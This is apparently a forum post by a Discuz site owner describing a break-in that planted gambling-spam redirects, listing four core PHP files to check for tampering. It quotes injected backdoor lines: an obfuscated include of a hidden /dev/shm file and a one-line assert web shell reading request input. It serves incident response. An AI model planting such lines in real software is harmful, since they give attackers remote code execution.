discuz 被入侵后，最可能被修改的文件

最近发现站点被黑了，如今还不知道是由系统漏洞致使的系统帐户被攻陷，仍是程序漏洞，文件被篡改。有一些敏感关键词（例如：赌博，电子路单）被恶意指向，点击搜索结果自动跳转到其余站点，并且是大量的，经过搜索“site:xxx.com 赌博”，会发现一大堆。该目的是为该站点导流量，还有传递权重。

为了防止暴露，入侵者会把被篡改的文件时间戳保持不变，因此经过修改时间是发现不到可疑文件的

如今解决办法只限于，查找程序源码，一个一个文件对比最初的文件，最后发现有两个文件最重要，以下：

1. source/function/function_core.php
2. uc_server/control/admin/user.php
3. source/class/discuz/discuz_admincp.php
4. source/class/discuz/discuz_application.php

由于这四个文件，function_core.php是是核心函数库全部页面都会包含；user.php是ucenter后台登录，discuz_admincp.php是discuz管理中心用户登陆，均可以得到管理员帐号和密码；discuz_application.php是整个discuz初始化的核心类文件，初始化加载。

遇到相同问题的朋友，请首先查看这几个文件是否被修改。

 

入侵方式一：通常会在全局文件中include一个外部的文件，例如：

@include('/dev/shm/.../tmp');

@include(PACK('H*','2f746d702f2e612f636c69656e742e706870'));

 

入侵方式二：

植入代码，能够执行外部传入的代码，例如：@array_map("ass\x65rt",(array)@$_REQUEST['ADMINCPS']);

ass\x65rt 其实就是 “assert”。

 

根据上面的线索，在下面的地方应该能够发现一些有恶意代码的文件，通常是恶意搜索引擎

• 系统的虚拟内存是否有东西，ls -a /dev/shm/ 例如：三个点的... 的隐藏文件
• ls -a /tmp  这个也要注意

 

 

顺便举报一些黑站：

• mujj.wang